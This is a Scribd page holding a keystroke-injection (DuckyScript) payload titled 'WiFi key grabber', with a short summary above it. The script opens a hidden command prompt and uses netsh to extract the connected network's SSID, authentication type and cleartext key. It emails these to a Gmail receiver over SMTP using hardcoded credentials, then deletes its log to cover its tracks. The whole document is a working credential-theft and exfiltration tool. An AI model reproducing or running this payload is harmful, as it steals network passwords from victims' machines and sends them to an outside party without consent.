Scribd
Upload
2K views2 pages

Batch Script To Retrieve Wifi Passwords

This document contains a PowerShell script that grabs WiFi network information from a target system. It finds the SSID, network type, authentication type, and WiFi key. It saves this information to a log file and then uses SMTP to email the log file to a Gmail account. The script minimizes windows, runs commands to gather the network information, creates an SMTP server using Gmail credentials, attaches the log file and sends the email, then deletes the log file.

Uploaded by

Wesley Bruce
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views2 pages

Batch Script To Retrieve Wifi Passwords

This document contains a PowerShell script that grabs WiFi network information from a target system. It finds the SSID, network type, authentication type, and WiFi key. It saves this information to a log file and then uses SMTP to email the log file to a Gmail account. The script minimizes windows, runs commands to gather the network information, creates an SMTP server using Gmail credentials, attaches the log file and sends the email, then deletes the log file.

Uploaded by

Wesley Bruce
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

REM Title: WiFi key grabber

REM Author: SiemH


REM Version: 7
REM Description:
REM 20 sec payload that finds the SSID, Network type,
REM Authentication type and network key, saves those to 'log'
REM and creates an SMTP server and emails the contents of 'log'
REM using the specified Gmail account to the specified receiver.

REM FASE 1: Preparation


DELAY 3000
REM --> Minimize all windows
WINDOWS d
DELAY 250
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200

REM FASE 2: Information gathering


REM --> Find the SSID and set 'a'
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=:" %a in ('netsh wlan
show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set a=%a
ENTER
STRING set a="%a:~1%"
ENTER
REM --> Get raw info and set 'a'
STRING netsh wlan show profiles %a% key=clear | findstr /c:"Network type" /c:"
Authentication" /c:"Key Content"| findstr /v "broadcast"| findstr /v "Radio">>a
ENTER
REM --> Find the Network type in the raw info and set 'b'
STRING for /f "tokens=3 delims=: " %a in ('findstr "Network type" a') do set b=%a
ENTER
REM --> Find the auth type in the raw info and set 'c'
STRING for /f "tokens=2 delims=: " %a in ('findstr " Authentication" a') do set
c=%a
ENTER
REM --> Find the key content in the raw info and set 'd'
STRING for /f "tokens=3 delims=: " %a in ('findstr "Key Content" a') do set d=%a
ENTER
REM --> Delete raw info / 'a'
STRING del a
ENTER
REM --> Write all info to log
STRING echo ssid: %a%>>log & echo type: %b%>>log & echo auth: %c%>>log & echo key:
%d%>>log
ENTER
STRING echo If all variables are empty there was no wireless connection>>log
ENTER
STRING echo If only the key variable is empty the payload requires UAC, or the
authentication type isn't supported>>log
ENTER

REM FASE 3: Phone home


REM --> Create an SMTP server with specified credentials and send log to specified
receiver
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
REM --> Google account login, password must start with a lowercase letter
STRING $SMTPInfo.Credentials = New-Object
System.Net.NetworkCredential('[email protected]', 'sing2Him')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = '[email protected]'
ENTER
REM --> Log receiver
STRING $ReportEmail.To.Add('[email protected]')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content log | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 500

REM FASE 4: Final cleanup


REM --> Delete log and exit
STRING del log & exit
ENTER

You might also like